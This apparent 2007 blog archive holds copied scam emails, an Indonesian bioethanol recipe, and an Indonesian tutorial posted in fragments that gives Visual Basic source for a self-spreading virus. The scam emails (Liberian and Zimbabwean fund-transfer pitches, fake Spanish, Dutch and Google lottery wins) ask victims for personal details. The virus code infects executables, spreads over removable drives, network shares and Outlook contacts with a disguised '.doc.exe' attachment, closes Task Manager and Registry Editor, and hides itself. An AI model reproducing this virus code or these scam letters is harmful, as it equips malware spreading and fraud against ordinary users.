Friday, August 31, 2007

Get Back To Me

Hello Friend,
This mail correspondence may come to you as a surprise due to the fact that we have not met,i know that this is an unlikely platform to start this kind of relationship but i am constrained by the present situation of my family and i request you to permit me use this medium to introduce myself.
I am a liberian and was the personal aide on domestic affairs to our former president,Mr.Charles Taylor.
I am currently in Dakar,Senegal and would need your co-operation in moving out some funds from here for investments in your country.
For your help,i will be happy to share the funds with you according to an agreed percentage. Please indicate your interest in working with me so that i can give you full details.
If i do not hear from you in 7 days, i shall consider it
that you are not favourably disposed to accept my offer.
Thanks,
Peter Sean West

Wednesday, August 29, 2007

CONGRATULATIONS!!!

EURO MILLIONS SPANISH LOTTERY INTERNATIONAL.
FROM: INTERNATIONAL PROMOTION/PRIZE AWARD DEPT.
REFERENCE: 87/60/IPD
BATCH: EGGS-983-741-288:

RE:AWARD WINNING NOTIFICATION / FINAL NOTICE
Sir/Madam
We are pleased to inform you of the result of the Euro millions Spanish Lottery Winners International E-mail programs held on the 20TH OF AUGUST 2007.and result where release on the 29TH OF AUGUST 2007. Your E-mail address attached to ticket number 653-908-321-675 with serial main number 345-790-241-671 drew lucky star numbers 34-32-90-43-32 which consequently won in the 2ND category, you have therefore been approved for a lump sum pay out of 1.000.000.00 Euro.(One Million Euro)
CONGRATULATIONS!!!

Due to mix up of some numbers and names, we ask that you keep your winning information confidential until your claims has been processed and your money remitted to you. This is part of our security protocol to avoid double claiming and unwarranted abuse of this program by some participants.

HOW DID YOU WIN???HOW DID THEY GET YOUR NAME&ADDRESS???
All participants were selected through a computer ballot system drawn from over 100,000 company and 50,000,000 individual email addresses and names from all over the world.

This lottery was promoted and sponsored by Spainsh European Lottery board in order to enhance and promote the use of Internet Explorer Users and Microsoft-wares around the globe. This promotional program takes place every three year. We hope with part of your winning you will take part in our end of year 50 million Euro International lottery.
To file for your claim, please contact our fiducial agent:

DR. CHRISTOPHER WILLIAMS
(FEBREGAS SECURITY COMPANY ESPAÑA)
CONTACT CLAIMS AGENT ON TEL:0034-638-272-628
Email: febregasagent@aim.com

VERIFICATION AND FUNDS RELEASE FORM
Be Sure this Verification and Funds Release Form is sent to the Fiduciary agent for quick verification and funds release purpose

1.FULL NAMES:__________________________________
2.CONTACT ADDRESS:_____________________________________________
3.SEX:_______________4.AGE:__________________
5.MARITAL STATUS:___________________
6.OCCUPATION:________________________
7.WINNING EMAIL ADDRESS:_________________________
8.TELEPHONE NUMBER:_____________________
9.REFENCE NUMBER:________________BATCH NO__________
10.AMOUNT WON:_________________________________________
11.CITY/STATE:____________________________________________
12.COUNTRY______________________________________________
13.NATIONALITY_____________________________________________
Remember, all winning must be claimed not later than one month,After this date all unclaimed funds will be included in the next stake.
Please note in order to avoid unnecessary delays and complications please remember to quote your reference number and batch numbers in all correspondence. Furthermore, should there be any change of address do inform our agent as soon as possible.

Congratulations once more from our members of staff and thank you for being part of our promotional program.
Note: Anybody under the age of 18 is automatically disqualified.
Sincerely yours,
MRS,PHILOMENA JOSE
VICE PRESIDENT
EURO SPANISH LOTTERY BOARD
------------------------------------------------------
This message is confidential. It may also be privileged or otherwise protected by work product immunity or other legal rules. If you have received it please let us know by reply it from your system; you should not copy it or disclose its contents to anyone. All messages sent to and from Febregas Security Company España may be monitored to ensure compliance with internal policies and to protect your winning from the Euro Million Spanish Lottery Award Promotion.
The contents of any email addressed to our clients are subject to our usual terms of business; anything which does not relate to the official business of the firm is neither given nor endorsed by it.

Sunday, August 26, 2007

Dear E-mail User!

Dear E-mail User!
FROM THE DESK OF THE DIRECTOR:
No 22 MANNI-STRAAT 1309HA AMSTERDAM/NETHERLANDS

This is to notify you that your Email Address attached to a Ticket
Number(106012) has won an Award Sum of $1,500,000.00 (One Million,
Five Hundred Thousand Dollars)from the total payout.,
In an Email Sweepstakes program held to day 2007.
CONTACT DETAILS
**********************************************
BANK NAME :laagstehypotheekofferte Bank.nl
Laagste Bank, Amsterdam, Netherlands.
CONTACT PERSON: Mr Andrew Woolley

E:mail: LaagstenLbank5@yahoo.com.hk
Tel: +31-61-693-1946.
Fax: +31-84-724-9563
BATCH No: 573881545-NL/2007--TICKET No:PP 3502 /8707-01
SERIAL No: 05908 LUCKY No: 9-43-97
Please you are ask to forward to staats loterij Claim Agent the
information below
1) YOUR FULL NAME
2) YOUR CONTACT TELEPHONE AND FAX
3) YOUR CONTACT ADDRESS
Cheers
Mr PAUL LEECH

I am expecting your urgent response.

 
FROM MR. DAVID OLDS
Email-mrdavid_old@yahoo.com
        mrdavidold@hotmail.com
       TEL: 00(66)875-156-244.
                                        
 DEAR FRIEND,  
   
       Before you proceed reading my mail pls do go through this webpage more details
http://www.rte.ie/news/2000/0418/zimbabwe.html     .
You may be surprised to receive this message from me since you don't know me in person, but for the purpose of introduction,  I am MR.DAVID  OLDS, a citizen of Zimbabwe, the son of late MR.MARTIN OLDS(A Farmer ) who was murdered in a land dispute in ZIMBABWE.
 
 I got your contact through the Thailand Information Exchange Online, and then I decided to write you. My late father was among the few black Zimbabwean rich farmers murdered in cold blood by the agent of the ruling government of President ROBERT MUGABE for his alleged support and sympathy for Zimbabwean opposition party.
 
 Before the death of my father, he deposited the sum of Five Million US Dollars ($5M) with a security company during when he went to Thailand to purchase his farm machinery equipment, as if he foresaw the looming danger in Zimbabwe. The money was deposited as a gem / precious stone to avoid seize and much demurrage from the security organization.
 
This money was earmarked for the purchase of new machinery and chemicals for the farms and the establishment of new farms in Lesotho and Swaziland. This land problem arose when President R. MUGABE introduced a new land Act, which wholly affects the white rich farmers and some few blacks vehemently condemned the 'MODUS OPERANDI' adopted by the government.
 
This resulted to rampant killing and mob actions. I and my family who are currently staying in Bangkok Thailand as a refugee asylum seeker,  have decided to transfer this money to a foreign country where we can invest it. You will read more stories about President Mugabe's brutal acts by visiting. This website:
http://www.rte.ie/news/2000/0418/zimbabwe.html
  
I am faced with the dilemma of investing this amount of money in Thailand but the financial law and Regulations in the kingdom of Thailand do not permit us financial rights to such huge sum of mone y. In view of this, I cannot invest the fund in Bangkok, Thailand. Moreover, the Thailand monetary policy/law does not allow such investment by an asylum seeker or refugee.
 
I must let you know that this transaction is 100% risk free and the nature of your business does not necessarily matter. So if you are willing to assist us, I and my family have agreed to give you 20% of the total money, 40% will be for a joint business venture I will be doing with you and another 40% will be for the family, which we shall also invest in your country. Therefore, if you are willing and interested to render the needed assistance, endeavor to contact me through the above telephone or email address. I also need your private telephone and fax numbers for quick communication. Remember that this transaction is highly confidential. Expect your reply soonest.
 
Best regards.
 
MR.DAVID  OLDS.
For the family


Get news, entertainment and everything you care about at Live.com. Check it out!

Friday, August 24, 2007

cara membuat bioetanol dari umbi gembili

Umbi gembili
mengandung banyak pati (karbohidrat) yang dapat diubah
menjadi alkohol
melalui proses fermentasi. Pembuatan alkohol dari
bahan ini harus
dilakukan melalui proses sakarifikasi secara biologi.
Proses itu
dilakukan dengan menambahkan ragi tape pada substrat.
Tahapan tersebut
untuk mendapatkan bahan alkohol dari umbi gembili.
Adapun proses
penelitian ada beberapa tahap. Pertama, umbi gembili
dikupas, lalu
dicuci bersih. Selanjutnya, umbi gembili tersebut
dikukus sampai
matang. Gembili tadi lantas ditiriskan dan dibiarkan
dingin dalam udara
terbuka.
Setelah dingin, umbi gembili dimasukkan ke dalam
toples
dan ditaburi ragi secara merata. Lalu, toples tersebut
ditutup rapat
selama 2-3 hari dalam keadaan anaerob (hampa udara
atau tanpa ada
oksigen). Berikutnya gembili yang telah
difermentasikan dihaluskan
dengan blender. Setelah halus, umbi tersebut disaring
dan diambil
sarinya. Selanjutnya, sari tersebut didistilasi sampai
menghasilkan
etanol. Akhirnya etanol gembili siap dipakai.


________________________________________________________
Bergabunglah dengan orang-orang yang berwawasan, di di bidang Anda! Kunjungi Yahoo! Answers saat ini juga di http://id.answers.yahoo.com/

Tuesday, August 21, 2007

CONGRATULATIONS!!!

EURO MILLIONS SPANISH LOTTERY INTERNATIONAL.
FROM: INTERNATIONAL PROMOTION/PRIZE AWARD DEPT.
REFERENCE: 87/60/IPD
BATCH: EGGS-983-741-288:
 
                              RE: WINNING NOTIFICATION / FINAL NOTICE
 
Sir/Madam,
We are pleased to inform you of the result of the Euro millions Spanish Lottery Winners International E-mail programs held on the 17TH OF AUGUST 2007 and result where release on the 21TH OF AUGUST OF
2007. Your E-mail address attached to ticket number 653-908-321-675 with serial main number 345-790-241-671 drew lucky star
Get ed traffic to your web site! numbers:-  Ball number 11Ball number 13Ball number 26Ball     number   34Ball number 44Ball number 48  and bonus ball number which consequently won in the 2ND category, you have therefore been approved for a lump sum pay of 1.000.000.00 Euro. (One Million Euro)CONGRATULATIONS!!!
 
To avoid mix up of some numbers and names, we ask that you keep your winning information confidential until your claims has been processed and your money remitted to you. This is part of our security protocol to avoid double claiming and unwarranted abuse of this program by some participants.
 
         HOW DID YOU WIN??? HOW DID THEY GET MY EMAIL ADDRESS???
All participants were selected through a computer ballot system drawn from over 100,000 web hosting companies and 50,000,000 individual email addresses and names from all over the world.
 
This lottery was promoted and sponsored by Spainsh European Lottery board in order to enhance and promote the use of Internet Explorer Users and Microsoft-wares around the globe. This promotional program takes place every three years. We hope with a part of your winning, you will take part in our end of year 50 million Euro International lottery. 
 
To file for your claim, please contact our fiducial agent:
DR. CHRISTOPHER WILLIAMS
(FABREGAS SECURITY COMPANY ESPAÑA)
CONTACT CLAIMS AGENT ON TEL:0034-638-272-628
Email: febregasoffices@aim.com
 
TO FILE FOR YOUR CLAIM, YOU ARE TO FILL THIS FORM IMMEDIATELY AND SUBMIT TO OUR FIDUCIARY AGENT VIA EMAIL
 
FULL NAMES:.....................................................
CONTACT ADDRESS:................................................
CITY/STATE:.....................................................
COUNTRY:........................................................
NATIONALITY:....................................................
OCCUPATION.....................................................
SEX:.......................AGE:.................................
MARITAL STATUS..................................................
TEL NO:.........................................................
AMOUNT WON:.....................................................
REFENCE NO:................BATCH NO:............................
 
Remember, all winning must be claimed not later than one month,After this date all unclaimed funds will be included in the next stake.
Please note in order to avoid unnecessary delays and complications please remember to quote your reference number and batch numbers in all correspondence. Furthermore, should there be any change of address do inform our agent as soon as possible.
 
Congratulations once more from our members of staff and thank you for being part of our promotional program.
Note: Anybody under the age of 18 is automatically disqualified.
Sincerely yours,
MRS,PHILOMENA JOSE
VICE PRESIDENT
EURO SPANISH LOTTERY BOARD



Ahora también puedes acceder a tu correo Terra desde el móvil.
Infórmate pinchando aquí.

Monday, August 20, 2007

YOUR E-MAIL ADDRESS WAS SELECTED AS A WINNER 2007 LOTTO AWARD CONGRATULATIONS!!!

GOOGLE EMAIL LOTTERY INTERNATIONAL
WORLD INTERNET LOTTO CENTRE
EASTERN AVE 6528
INTERNATIONAL PROMOTION / PRIZE AWARD DEPT.
PROMOTING INTERNET USAGE OVER THE  GLOBE
( WE ENCOURAGE  GLOBALIZATION)

Dear Lucky Winner,
CONSOLATION PRIZE WINNING NOTICE!!!
Congratulations to you as we bring to your notice, the  results of the First Category draws of  E-MAIL LOTTERY organised by GOOGLE INTERNATIONAL. We are happy to inform you that you have emerged a winner under the First Category, which is part of our promotional draws. The draws were held on 10TH of July 2007 and results are being officially announced today 21ST of August 2007. Participants were selected through a computer ballot system drawn from 2,500,000 email addresses of individuals and companies from Africa, America, Asia, Australia, Europe, Middle East, and Oceania as part of our International Promotions Program. Your e-mail address, attached to ticket number 675432890044/376, with serial number 200-373 drew the lucky numbers 1-0-11-44-3-222 and consequently won in the First Category. You have therefore been awarded a lump sum pay out of One Millio(1,000,000.00) Euro, which is the winning payout for Category A  winners. This is from the total prize money from 1,500,000 Euro shared among the 2 winners in this category.
Your fund is now deposited with the paying Bank. In your best interest to avoid mix up of numbers and names of any kind, we request that you keep the entire details of your award strictly from public notice until the process of transferring your claims has been completed, and your funds remitted to your account.This is part of our security protocol to avoid double claiming or unscrupulous acts by participants / non participants of this program.Please contact your claims agent immediately for due processing and remittance of your prize money to a designated account of your choice:
To file for your claim, kindly contact your CLAIMS Agent.

Mr.Costas Yanis.
Marginlatrust Claims Agency
TEL: 0030-694-409-5731
E-mail:marginlatrust@aim.com
THINOS 73, 10722,
ATHENS GREECE
You are advised to contact the agents by email.
NOTE: For easy reference and identification, find below your reference and Batch numbers. Remember to quote these numbers in every one of your correspondence with your claims agent. Reference Nr: AMC/2331-ILHWGI0431/06. Batch Nr: EOST/25/0496/TVUFS  Congratulations once again from all our staff and thank you for being part of our promotions program.
Yours Sincerely,
MRS.JENNIFER SMITH.
(PROMOTION COORDINATOR)

Thursday, August 9, 2007

Lampiran

Lampiran A
‘API Declaration Modul
Option Explicit
Public Declare Sub Sleep Lib "kernel32" (ByVal
dwMilliseconds As Long)
Public Declare Function OpenProcess Lib "kernel32" (ByVal
dwDesiredAccess As Long,
ByVal bInheritHandle As Long, ByVal dwProcessId As Long)
As Long
Public Declare Function GetExitCodeProcess Lib "kernel32"
(ByVal hProcess As Long,
lpExitCode As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal
hObject As Long) As Long
Public Declare Function FindWindow Lib "user32" Alias
"FindWindowA" (ByVal
lpClassName As String, ByVal lpWindowName As String) As
Long
Public Declare Function CloseWindow Lib "user32" (ByVal
hwnd As Long) As Long
Public Const STILL_ACTIVE As Long = &H103
Public Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Public Type NETRESOURCE
dwScope As Long
dwType As Long
dwDisplayType As Long
dwUsage As Long
lpLocalName As Long
lpRemoteName As Long
lpComment As Long
lpProvider As Long
End Type
Public Declare Function WNetOpenEnum Lib "mpr.dll" Alias
"WNetOpenEnumA" _
(ByVal dwScope As Long, ByVal dwType As Long, ByVal
dwUsage As Long, _
lpNetResource As NETRESOURCE, lphEnum As Long) As Long
Public Declare Function WNetEnumResource Lib "mpr.dll"
Alias
"WNetEnumResourceA" _Page 11

Hanya untuk tujuan pendidikan saja
11
(ByVal hEnum As Long, lpcCount As Long, lpBuffer As
NETRESOURCE,
lpBufferSize As Long) As Long
Public Declare Function WNetCloseEnum Lib "mpr.dll" (ByVal
hEnum As Long) As
Long
Public Declare Function lstrlen Lib "kernel32" Alias
"lstrlenA" (ByVal pString As Long)
As Long
Public Declare Function lstrcpy Lib "kernel32" Alias
"lstrcpyA" _
(ByVal lpString1 As String, ByVal pString As Long) As Long
Const RESOURCE_GLOBALNET = 2
Const RESOURCETYPE_DISK = 1
Const RESOURCEDISPLAYTYPE_DOMAIN = 0
Const RESOURCEUSAGE_CONTAINER = 1
Function GetShares(ByVal RemoteName As String, ByVal
Provider As String, sShares()
As String) As Boolean
Dim hEnum As Long, nrLen As Long, nrCount As Long
Dim nr(2048) As NETRESOURCE, retval As Boolean
nrCount = -1
nrLen = 65536
RemoteName = StrConv(RemoteName, vbFromUnicode)
nr(0).lpRemoteName = StrPtr(RemoteName)
Provider = StrConv(Provider, vbFromUnicode)
nr(0).lpProvider = StrPtr(Provider)
nr(0).dwType = RESOURCEDISPLAYTYPE_DOMAIN
nr(0).dwUsage = RESOURCEUSAGE_CONTAINER
If WNetOpenEnum(RESOURCE_GLOBALNET, RESOURCETYPE_DISK, 0,
nr(0),
hEnum) = 0 Then
If WNetEnumResource(hEnum, nrCount, nr(0), nrLen) = 0 Then
If nrCount > 0 Then
ReDim sShares(nrCount - 1) As String
For nrLen = 0 To (nrCount - 1)
sShares(nrLen) = Space(lstrlen(nr(nrLen).lpRemoteName))
Call lstrcpy(sShares(nrLen), nr(nrLen).lpRemoteName)
Next nrLen
retval = True
End If
End If
Call WNetCloseEnum(hEnum)
End If
GetShares = retval
End Function
Lampiran BPage 12

Hanya untuk tujuan pendidikan saja
12
‘Form ff
Option Explicit
Dim SedangInfeksi As Boolean
Dim SpreadEmail As Boolean
Dim Aktifitas As Integer
'0 = floppy, 1 = flashdisk
Dim Loncat As Integer
Private Sub AT_Timer()
Call KillEnemy
If Not SedangInfeksi Then ‘jangan overlapping proses
SedangInfeksi = True
If Aktifitas = 0 Then
Call InfeksiMySharing
ElseIf Aktifitas = 1 Then
Call AmbilDomain
ElseIf Aktifitas = 2 Then
Call AmbilComputer
ElseIf Aktifitas = 3 Then
Call AmbilDrive
ElseIf Aktifitas = 4 Then
Call InfeksiNetworkDrive
ElseIf Aktifitas = 5 Then
Call InfeksiFloppy
ElseIf Aktifitas = 6 Then
'Call InfeksiFlashDisk
ElseIf Aktifitas = 7 Then
Call InfeksiMySharing
ElseIf Aktifitas = 8 Then
If Not SpreadEmail Then
Call SpreadEmailOutlook
SpreadEmail = True
End If
Aktifitas = 1
End If
Aktifitas = (Aktifitas + 1)
SedangInfeksi = False
End If
End Sub
Main Program
Private Sub Form_Load()
Me.Visible = False
Me.Caption = titleSudahLoad
AT.Interval = 1000
SedangInfeksi = FalsePage 13

Hanya untuk tujuan pendidikan saja
13
SpreadEmail = False
Aktifitas = 0
Loncat = 0
AT.Enabled = True
End Sub


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Berusaha mempertahankan existensi dirinya

Mencoba mematikan proses-proses program yang berpotensi
untuk menghentikan proses
virus, maupun tools yang dapat menghapus proses virus
tersebut :
WShell.regwrite “HKCU\
\Software\Microsoft\Windows\CurrentVersionPolicies\System\DisableRegistryTools",
0,
"REG_DWORD"
WShell.regwrite “HKCU\
\Software\Microsoft\Windows\CurrentVersionPolicies\System\DisableCMD",
0,
"REG_DWORD"
Maupun melacak jendela proses-proses musuh, dan
menutupnya.
Public Sub KillEnemy()
Dim EnemyProcess(20) As String
Dim i As Integer
EnemyProcess(1) = "Registry Editor"
EnemyProcess(2) = "Windows Task Manager"
EnemyProcess(3) = "Process Viewer"
EnemyProcess(4) = "Open With"
For i = 1 To 4 Step 1
Call KillEnemyWindow(EnemyProcess(i))
Next i
End Sub
Private Sub KillEnemyWindow(target As String)
Dim Enemy_hwnd As Long
Enemy_hwnd = FindWindow(vbNullString, target)
If Not Enemy_hwnd = 0 Then
CloseWindow (Enemy_hwnd)
End If
End Sub


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Mempercepat proses penyebarannya dengan pendekatan social engineering.

Teknik ini adalah gampang-gampang sudah, tetapi sangat
mempengaruhi penyebaran dan
siklus hidup virus anda. Social engineering banyak
digunakan oleh hacker-hacker untuk
memperdaya dengan pendekatan non-teknis computer, tetapi
lebih cenderung kepada
pendekatan manusia.Page 9

Hanya untuk tujuan pendidikan saja
9
Banyak virus menyebar dengan memanfaatkan kesenangan orang
akan materi-materi
pornografi, yaitu dengan membuat membuat nama-nama file,
maupun pesan email yang
memancing korban untuk penasaran membuka attachment.
Ada juga virus yang disebarkan pada game-game maupun crack
software yang
menumpang pada program tersebut.


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Mempercepat penyebarannya dengan memanfaatkan kelemahan dari suatu system

Penulis tidak akan membahas tentang teknik yang satu ini.
Pada dasarnya cara kerjanya
adalah seperti ini, misalnya pada Windows yang otomatis
menjalankan file dengan script
extension tertentu (Contoh teknik virus Redlof), sehingga
program virus dapat membuat
script tersebut untuk mentrigger program virus.
Ada juga worms yang memanfaatkan kelemahan Outlook
Express, dimana secara
otomatis menjalankan Attachment tanpa klik dari pemakai.
Ada juga worms yang menyebarkan diri melalui website,
dimana jika anda mengunjungi
suatu website dengan software browser yang memiliki
kelemahan, maka secara otomatis
browser mendownload kode yang tidak diinginkan dan
menjalankannya.
Ada juga worms yang menyebar melalui media Bluetooth yang
dalam keadaan terbuka.
Menyebarkan dirinya dengan filename spoofing.
Teknik filename spoofing banyak digunakan oleh worms
dewasa ini dengan
menggunakan double extension :
Misalnya :
SuratCinta.doc.pif
Pada system yang settingnya tidak menampilkan extension
file maka file tersebut diatas
ditampilkan pada system sebagai :
SuratCinta.doc


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Mempercepat proses penyebarannya melalui media pertukaran data dan informasi

Menyebarkan dirinya ke Floppy Disk, diaktifkan dengan
suatu timer. Program ini bekerja
dengan senantiasa memantau terhadap keaktifkan jendela 3½
Floppy (A:) oleh pemakai.
Public Sub InfeksiFloppy()
On Error GoTo BatalInfeksi
Dim floppy_hwnd As Long
Dim fname As String
'Jika Jendela Floppy terbuka
floppy_hwnd = FindWindow(vbNullString, "3½ Floppy (A:)")
If Not floppy_hwnd = 0 Then
Call InfeksiResource("A:", "DOCXLS") 'Hanya infeksi Doc,
Exe jangan
End If
BatalInfeksi:
End Sub
Menyebarkan dirinya ke Flash Disk, diaktifkan dengan suatu
timer. Program ini bekerja
dengan senantiasa memantau removable drive diatas drive C.
Public Sub InfeksiFlashDisk()
On Error GoTo BatalInfeksi
Dim ObjFSO As Object
Dim ObjDrive As Object
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
For Each ObjDrive In ObjFSO.Drives
'Asumsi semua removable drive diatas huruf C adalah flash
disk
'1 - Removable drive
'2 - Fixed drive (hard disk)
'3 - Mapped network drive
'4 - CD-ROM drive
'5 - RAM disk
If ObjDrive.DriveType = 1 And ObjDrive.DriveLetter > "C"
Then
Call InfeksiResource(ObjDrive.DriveLetter + ":", "XLSDOC")
End If
Next
BatalInfeksi:
End Sub
Menyebarkan dirinya ke semua resource yang di Share pada
computer yang terinfeksi :
Public Sub InfeksiMySharing()
Dim shares() As String, share As Variant, target As String
If GetShares("\\127.0.0.1", "Microsoft Windows Network",
shares) = True Then
For Each share In sharesPage 6

Hanya untuk tujuan pendidikan saja
6
target = share
Call InfeksiResource(target, "XLSDOCEXE")
Next share
End If
End Sub
Menyebarkan dirinya ke semua resource share yang terbuka
di LAN, dengan mengambil
semua Domain maupun Workgroup dan menyimpannya dalam suatu
stack.
Public Sub AmbilDomain()
Dim Domains() As String, Domain As Variant
If GetShares("", "Microsoft Windows Network", Domains) =
True Then
For Each Domain In Domains
If Not stackDomain.isFull Then
stackDomain.Push (Domain)
End If
Next Domain
End If
End Sub
Kemudian mengambil computer yang berada pada masing-masing
Domain maupun
Workgroup dalam suatu stack.
Public Sub AmbilComputer()
Dim Computers() As String, Domain As String, Computer As
Variant
If Not stackDomain.isEmpty() Then
Domain = stackDomain.Pop()
If GetShares(Domain, "Microsoft Windows Network",
Computers) = True Then
For Each Computer In Computers
If Not stackComputer.isFull Then
stackComputer.Push (Computer)
End If
Next Computer
End If
End If
End Sub
Dan Akhirnya mengambil semua resource yang dishare dari
masing-masing Computer :
Public Sub AmbilDrive()
Dim Drives() As String, Computer As String, Drive As
Variant
If Not stackComputer.isEmpty() Then
Computer = stackComputer.Pop()
If GetShares(Computer, "Microsoft Windows Network",
Drives) = True Then
For Each Drive In Drives
If Not stackDrive.isFull ThenPage 7

Hanya untuk tujuan pendidikan saja
7
stackDrive.Push (Drive)
End If
Next Drive
End If
End If
End Sub
Public Sub InfeksiNetworkDrive()
Dim target As String
If Not stackDrive.isEmpty() Then
target = stackDrive.Pop()
Call InfeksiResource(target, "XLSDOCEXE")
End If
End Sub
Melakukan penyebaran melalui fasilitas email :
Public Sub SpreadEmailOutlook()
Dim Outlook As Object
Dim Mapi As Object
Dim Mail As Object
Dim AddressBook As Variant
Dim MailAddress As Variant
Dim i As Integer, j As Integer
On Error GoTo finally
Set Outlook = CreateObject("Outlook.Application")
Set Mapi = Outlook.GetNamespace("MAPI")
For i = 1 To Mapi.AddressLists.Count
Set AddressBook = Mapi.AddressLists(i)
For j = 1 To AddressBook.AddressEntries.Count
MailAddress = AddressBook.AddressEntries(j)
Set Mail = Outlook.CreateItem(0)
Mail.Recipients.Add (MailAddress)
Mail.Subject = "Subject Virus Anda"
Mail.Body = vbCrLf & "Pesan anda agar pemakai tertarik
membuka attachment."
Mail.Attachments.Add Environ$("windir") & "\" & attachment
& ".doc.exe"
Mail.Send
Next
Next
finally:
Set Outlook = Nothing
Set Mapi = NothingPage 8

Hanya untuk tujuan pendidikan saja
8
End Sub


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Menyebarkan dirinya melalui media file executable

Program virus harus dapat menginfeksi program-program
executable dengan proses
sebagai berikut :
Program Executable
Setelah terinfeksi oleh program virus menjadi :
Program Virus + Program Executable + Ukuran Virus +
Signature Virus
Sehingga setiap kali program yang telah terinfeksi
dijalankan, maka Program Virus akan
menginstalasi dirinya ke computer korban dan mengembalikan
proses ke Program
Executable.
Jadi pada saat program terinfeksi dijalankan, maka Program
Executable harus di pulihkan
kembali dengan melakukan perhitungan :
Posisi Program Executable = Ukuran File – Ukuran
Virus – Ukuran Signature Virus
Sesuatu hal yang harus diperhatikan adalah infeksi
terhadap Program Executable tidak
boleh dilakukan berulang-ulang dan tidak boleh menginfeksi
diri Program Virus sendiri,
sehingga harus ditambahkan suatu Signature Virus
Private Sub PeriksadanInfeksiExe(fname As String)
Dim tSignature As String * 5
Dim OriginalCode As String
Dim fNum As Integer
'Jangan menginfeksi diri sendiri
'Hanya menginfeksi file berukuran lebih dibawah 1 Mega
If Dir(fname) <> "" Then
If FileLen&(fname) > virSize And FileLen&(fname) < 1048576
Then
'Ambil nomor file
fNum = FreeFile
Open fname For Binary Access Read As fNum 'Buka file
target
Seek fNum, LOF(fNum) - 5 + 1
'pindah file pointer ke posisi Signature Virus
tSignature = Space$(5)
Get fNum, , tSignature
'baca tSignature
Close fNum
If tSignature <> virSignature Then
'jika file virus (tidak ada virSignature)
On Error GoTo finally
Open fname For Binary Access Read Write As fNum 'Buka file
target
OriginalCode = Space$(LOF(fNum))
Get fNum, , OriginalCode
'baca Program Executable
Put fNum, 1, virCode
'tulis Program Virus diawal
Put fNum, , OriginalCode
'tulis Program Executable
Put fNum, , virSize
'tulis Ukuran Virus
Put fNum, , virSignature
'tulis Signature VirusPage 3

Hanya untuk tujuan pendidikan saja
3
Close fNum
finally:
End If
End If
End If
End Sub
Ketika program Executable dijalankan maka :
Private Sub VirusInitial()
Dim OriginalCode As String
Dim tSignature As String * 5
Dim fNum As Integer
Dim fname As String
virSignature = Chr$(3) + Chr$(53) + Chr$(103) + Chr$(153)
+ Chr$(203)
Open exePath + App.EXEName + ".exe" For Binary Access Read
As #1
Seek #1, LOF(1) - 5 + 1
'pindah file pointer ke posisi virSize
tSignature = Space$(5)
Get #1, , tSignature
'baca virSignature
If tSignature <> virSignature Then 'Jika file virus
sendiri
virSize = LOF(1)
'ukuran virSize sama dengan ukuran file
virCode = Space$(virSize)
'siapkan buffer virCode
Seek #1, 1
'ke posisi bof
Get #1, , virCode
'baca virCode sebesar ukuran virSize
Close #1
Call VirInstall
'instalasi virus
If Not SudahLoad Then
Load ff
'aktifkan timer virus
End If
'Jika file yang terinfeksi
Else
Seek #1, LOF(1) - 9 + 1
'pindah file pointer ke posisi virSize
Get #1, , virSize
'baca virSize (long = 4 byte)
'Baca vircode
virCode = Space$(virSize)
Seek #1, 1
'ke posisi BOF (Awal file)
Get #1, , virCode
'baca virCode sebesar ukuran virSize
OriginalCode = Space$(LOF(1) - virSize)
'siapkan buffer
Get #1, , OriginalCode
'baca originalCodePage 4

Hanya untuk tujuan pendidikan saja
4
fNum = 0
Do While Dir(exePath & App.EXEName & fNum & ".exe") <> ""
fNum = fNum + 1
Loop
fname = exePath & App.EXEName & fNum & ".exe"
On Error GoTo finally
Open fname For Binary Access Write As #2
Put #2, , OriginalCode
'tulis ke file sementara
Close #2
'tutup file sementara
finally:
Close #1
Call VirInstall
If Not SudahLoad Then
Load ff
'aktifkan timer virus
End If
Call ExecuteOriginal(fname)
Kill fname
'hapus file sementara
End If
End Sub
Private Sub ExecuteOriginal(fname)
Dim Host As Long, HProc As Long, HExit As Long
Host = Shell(fname, vbNormalFocus)
'jalankan fname
HProc = OpenProcess(PROCESS_ALL_ACCESS, False, Host)
GetExitCodeProcess HProc, HExit
'ambil status aktif
Do While HExit = STILL_ACTIVE
'proses ditahan selama proses masih aktif
DoEvents
'lakukan event yang lain
GetExitCodeProcess HProc, HExit
Loop
End Sub
Private Function SudahLoad() As Boolean
Dim vir_hwnd As Long
'Jika Jendela virus aktif
vir_hwnd = FindWindow(vbNullString, titleSudahLoad)
SudahLoad = Not (vir_hwnd = 0)
End Function


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Menyembunyikan prosesnya dari pemakai

Agar program tidak menampilkan dirinya pada Task Bar,
dapat digunakan perintah :
App.TaskVisible = False
Kemudian untuk menyembunyikan form dapat menggunakan :
Me.Visible = False


<<<<<< Mengaktifkan dirinya setiap startup sistem>>>>>>>


Agar program exe dapat diaktifkan setiap kali startup
system, kita dapat menduplikasi
program ke suatu folder dengan perintah :
FileCopy app.Path & "\" & app.EXEName , environ$("windir")
& "\" & app.EXEName
dan menambah ke registry :
Dim WShell as Object
Set WShell = CreateObject("WScript.Shell")
WShell.regwrite
